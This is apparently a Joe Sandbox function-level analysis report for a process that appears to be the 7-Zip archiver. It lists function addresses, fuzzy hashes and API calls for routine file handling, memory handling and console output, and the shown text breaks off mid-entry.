Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
Instruction ID: ff027d78fc0b59d0090c9c3978cfc8f770acd91144e14b36220492b6692e7fcd
Opcode Fuzzy Hash: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
Instruction Fuzzy Hash: 7C11B322326A4085CF19EF7AC8A162C7320FBC1F99B548662AF7E4B765CF24C846C354

Function 009A3A42 Relevance: 7.7, APIs: 6, Instructions: 151COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A3C0C
free.MSVCRT ref: 009A3C17
free.MSVCRT ref: 009A3C22
free.MSVCRT ref: 009A3C77
free.MSVCRT ref: 009A3C82

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
Instruction ID: 9a49cbab0d82ca072cc5d70e13d37019d4db06e99015b6b34e2d7933f48bad1a
Opcode Fuzzy Hash: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
Instruction Fuzzy Hash: C4512A63204A4491CF10EF25D4907AE6721F7D6FC8F909122EE5E97729DF78CA8AC741

Function 009B1544 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B15D5

Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232

Strings

Extracting archive: , xrefs: 009B15C7
Open, xrefs: 009B1604
Testing archive: , xrefs: 009B15C0

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$memset
String ID: Extracting archive: $Open$Testing archive:
API String ID: 3543874852-295398807
Opcode ID: 57ce32b18a297629e4857599c7fb9a690bf538672504f27dd934718ea67813a2
Instruction ID: 12e9557fb1bd9e576460279b2e33f9272377cf4b30d931ccf4e21b68751d533f
Opcode Fuzzy Hash: 57ce32b18a297629e4857599c7fb9a690bf538672504f27dd934718ea67813a2
Instruction Fuzzy Hash: 4811C42375268284EF50DB29DA647EC2364E794FA8F5C8431DE0D4B355EF38C48AC310

Function 009B2E24 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B2E47
fputs.MSVCRT ref: 009B2E57
free.MSVCRT ref: 009B2EA4

Part of subcall function 009B2CFC: fputs.MSVCRT ref: 009B2D41
Part of subcall function 009B2CFC: fputs.MSVCRT ref: 009B2DCF
Part of subcall function 009B2CFC: free.MSVCRT ref: 009B2DFF

Strings

= , xrefs: 009B2E50

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$free
String ID: =
API String ID: 3873070119-2525689732
Opcode ID: 5f170de45124cbf05d2114cb4ce541d5ab7e7f6622d8dac823fc30cd2b14e81d
Instruction ID: 29e7509ce578295f6f37815298356e318368525903d908a3647b9ff7a6618c87
Opcode Fuzzy Hash: 5f170de45124cbf05d2114cb4ce541d5ab7e7f6622d8dac823fc30cd2b14e81d
Instruction Fuzzy Hash: CBF01D92714A0091DA20A726EE5577E5361EBD5FF4F08D321AE6E0BBA9DF28C9468700

Function 009A49B0 Relevance: 6.4, APIs: 5, Instructions: 106COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A4A5C
free.MSVCRT ref: 009A4A67
free.MSVCRT ref: 009A4AE4

Part of subcall function 00973314: memmove.MSVCRT ref: 00973339

free.MSVCRT ref: 009A4B0F
free.MSVCRT ref: 009A4B1A

Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmallocmemmove
String ID:
API String ID: 3352498445-0
Opcode ID: cd356717b46294ebbf87faeea91df8213fb96c8abb4be4db24926ca1e4725612
Instruction ID: c3fdc6a3fa7775cf0451a75e3f213fc2386047b36d4371620bf53cc53693deb9
Opcode Fuzzy Hash: cd356717b46294ebbf87faeea91df8213fb96c8abb4be4db24926ca1e4725612
Instruction Fuzzy Hash: FE41AD23254B8491CB60EF26E8503AE6764FBC6B84F889132EB8E47729DF78C595C354

Function 009BE120 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
Instruction ID: 52a84e4f4adbb2b013ff403ba64e3ef5aaa0b078e315478308c34f951a3bf3b7
Opcode Fuzzy Hash: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
Instruction Fuzzy Hash: D6311972224B41C6EB10DF28F9A439A7775F784BB4F504226E6A9537B6DB3CC885CB00

Function 00972320 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0097237E
free.MSVCRT ref: 009723AB
fputs.MSVCRT ref: 009723B8
free.MSVCRT ref: 009723C4

Part of subcall function 00973274: memmove.MSVCRT ref: 009732AC

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$fputsmemmove
String ID:
API String ID: 4106585527-0
Opcode ID: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
Instruction ID: 7316ee7104aba85a4e0ca7c374580417bc3852bce845dc20f1bdb879ef4417a9
Opcode Fuzzy Hash: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
Instruction Fuzzy Hash: B401486331844091DE20AB25E85165E6721EBD5BF4F44D321FE6F876F9DE2CC686C704

Function 009768A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE ref: 009768C7
SetFileAttributesW.KERNEL32 ref: 00976903
free.MSVCRT ref: 00976913
free.MSVCRT ref: 00976921

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: AttributesFilefree
String ID:
API String ID: 1936811914-0
Opcode ID: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
Instruction ID: 358c3ec10f022044d2aeb762319bfad29991c51428fb5f69bb29424b4b3556ea
Opcode Fuzzy Hash: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
Instruction Fuzzy Hash: BF01DB23308A0182D6309B25E99037E5768ABC97F4F58C321DE7D877A5CF28CD879711

Function 00977D4C Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE ref: 00977D6E
GetFileAttributesW.KERNEL32 ref: 00977DA5
free.MSVCRT ref: 00977DB2
free.MSVCRT ref: 00977DC0

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: AttributesFilefree
String ID:
API String ID: 1936811914-0
Opcode ID: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
Instruction ID: 208225795b25e0f074298446e310589f60a16a56d7d467a655e4536af3150752
Opcode Fuzzy Hash: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
Instruction Fuzzy Hash: 7BF0312720860085CA30AB75AD9037D6324AFCA7F4F548720EA7D867F5DF14C9868700

Function 00993E14 Relevance: 5.1, APIs: 4, Instructions: 142COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00993F66
memmove.MSVCRT ref: 00993F8B
free.MSVCRT ref: 00994028
free.MSVCRT ref: 00994033

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
Instruction ID: b3c1642195fd07a1cb167519e75db4a54b287509be086cdf9ea5ed7d394fb983
Opcode Fuzzy Hash: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
Instruction Fuzzy Hash: 50514A73604A8097CE30DF1AE88029DB364F7C9BD4F408226EB9E47B59DF28D5A5CB54

Function 00999BCC Relevance: 5.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00999C11
free.MSVCRT ref: 00999C19
free.MSVCRT ref: 00999C3B
free.MSVCRT ref: 00999D2A

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2703c9f3fbddb521d8c4c51cfedb35860992798216a6655cd283f4a4fda484df
Instruction ID: 2b543bcef068ab197ea595377ecf9ca5ab7201c352a7ad3763e94ea9fec5d3ac
Opcode Fuzzy Hash: 2703c9f3fbddb521d8c4c51cfedb35860992798216a6655cd283f4a4fda484df
Instruction Fuzzy Hash: 663184637156848ACF30DF1EE88051E6765F7D97A4B988239FF9E47758EA38C841C700

Function 0099A9FC Relevance: 5.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0099AA95
free.MSVCRT ref: 0099AAB8
free.MSVCRT ref: 0099AAC5
free.MSVCRT ref: 0099AAD2

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
Instruction ID: 6b0a0963ab9aec696084b1f1a232dd3e207cc69bb01a9233af132e5fe055f028
Opcode Fuzzy Hash: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
Instruction Fuzzy Hash: 59118A2321954052DE10EB65E5513AA9761EBD13F0F509321BBAE876FADE18C94BCB40

Function 0099CF80 Relevance: 5.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00973404: free.MSVCRT ref: 00973431
Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C

free.MSVCRT ref: 0099CFC9
_CxxThrowException.MSVCRT ref: 0099CFE6
free.MSVCRT ref: 0099D019
free.MSVCRT ref: 0099D021

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmemmove
String ID:
API String ID: 3934437811-0
Opcode ID: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
Instruction ID: ac0495b9202b3853fbf0c76d8cae702f38cf1b8878ecf0dfc4719956ef9207c2
Opcode Fuzzy Hash: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
Instruction Fuzzy Hash: 311181637057808BCA209F25E99039AA710FB967E4F488315AFAD077A9DF68C54AC710

Function 009901A8 Relevance: 5.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00990211
free.MSVCRT ref: 0099021C
free.MSVCRT ref: 00990249
free.MSVCRT ref: 00990254

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
Instruction ID: a0622799a1281bcfc9688b99dd7013267cff14c12bf0f275af010c277727f95e
Opcode Fuzzy Hash: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
Instruction Fuzzy Hash: 91019B2321C64481CE20EB26F55536E9721FBC67E4F44D2217EBE576BADF28C54AC704

Function 00978CDC Relevance: 4.6, APIs: 3, Instructions: 75fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009789D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 009789EA

CreateFileW.KERNELBASE ref: 00978D51
CreateFileW.KERNEL32 ref: 00978DA4
free.MSVCRT ref: 00978DB2

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: CreateFile$CloseHandlefree
String ID:
API String ID: 210839660-0
Opcode ID: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
Instruction ID: cbdb2a13399bd88e9d51b4c13f9dc0819e9a2a3979c309658cc0ac9721374e63
Opcode Fuzzy Hash: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
Instruction Fuzzy Hash: CE219D331446819AC7709F19B85575A6B28B3967F4F548321EFB943BE4DF38C8968B00

Function 009B2CFC Relevance: 4.6, APIs: 3, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00973274: memmove.MSVCRT ref: 009732AC

fputs.MSVCRT ref: 009B2D41
fputs.MSVCRT ref: 009B2DCF
free.MSVCRT ref: 009B2DFF

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$fputcfreememmove
String ID:
API String ID: 1158454270-0
Opcode ID: eef8350ceeca3f9f5c16306e4864ccddccb6ae17d882d2c6956f16779c2a39dd
Instruction ID: f465e58cc5111c820cc9fbe482779f82a432fd586cd5d580444ad0137cde9a9e
Opcode Fuzzy Hash: eef8350ceeca3f9f5c16306e4864ccddccb6ae17d882d2c6956f16779c2a39dd
Instruction Fuzzy Hash: 062130A2714A0181CF30EF26E86136E6361EBD5BF4F48D221EA5F4B7A9DE2CC545C700

Function 0097CE1C Relevance: 3.9, APIs: 3, Instructions: 178COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0097CF85
memmove.MSVCRT ref: 0097CFB7
GetLastError.KERNEL32 ref: 0097D020

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ErrorLast$memmove
String ID:
API String ID: 3796167841-0
Opcode ID: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
Instruction ID: be1d98e73a16b9c9a00677095d530252726f38b7e7f6d4d807b846e72e95cf55
Opcode Fuzzy Hash: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
Instruction Fuzzy Hash: E95101B3301B14A7DF25CE3AD6407A923A4FB49794F04952AEF0E87B50DB39D8A6C300

Function 00972300 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00972311

Strings

Kernel , xrefs: 00972300

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputc
String ID: Kernel
API String ID: 1992160199-1736990243
Opcode ID: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
Instruction ID: 700cca4380b09af1280e41b27d6c37aeec1dea90c7d333cba31dd9dd7e5267cd
Opcode Fuzzy Hash: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
Instruction Fuzzy Hash: CDC09295BA0A0882EF181BBBFC953292222D75DFE1F186030CE1D0B391DA2CD4E68721

Function 009BB1C8 Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 009BB20D
fputs.MSVCRT ref: 009BB232

Part of subcall function 00972B04: _CxxThrowException.MSVCRT ref: 00972B2D
Part of subcall function 00972B04: free.MSVCRT ref: 00972B44

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ExceptionThrowfputsfreememset
String ID:
API String ID: 3104931167-0
Opcode ID: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
Instruction ID: 9f581b4b1fc1f34d7e66438e833480b79bd45a9f59145d4b5622e1c241ecb10e
Opcode Fuzzy Hash: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
Instruction Fuzzy Hash: 4701C0737006909AE705DF6BEA8479E3724F769BA4F088022DF0807751DF74D8AAC310

Function 00978A60 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,00000003,?,00978E1D), ref: 00978A99
GetLastError.KERNEL32(?,?,00000003,?,00978E1D), ref: 00978AA6

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
Instruction ID: 51eb5a417bc356698c604dd8eb590e49785be58a3027ac38f30559cdfcd9d80e
Opcode Fuzzy Hash: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
Instruction Fuzzy Hash: 72F0FC63F417C083DF298B69D85C75A3759E759798FAC8422CA0C43750DF29C883C710

Function 009B0994 Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B09D5

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

free.MSVCRT ref: 009B09E9

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputcfputsfree
String ID:
API String ID: 2822829076-0
Opcode ID: 54155317de61db0833888d5a21ec2303f9cbf572859454e8d3a2ab1476f005a9
Instruction ID: 37dc1719e6f9e15cd4022bad4618c875fd41d747a876cd5cfdc44304c2ecc762
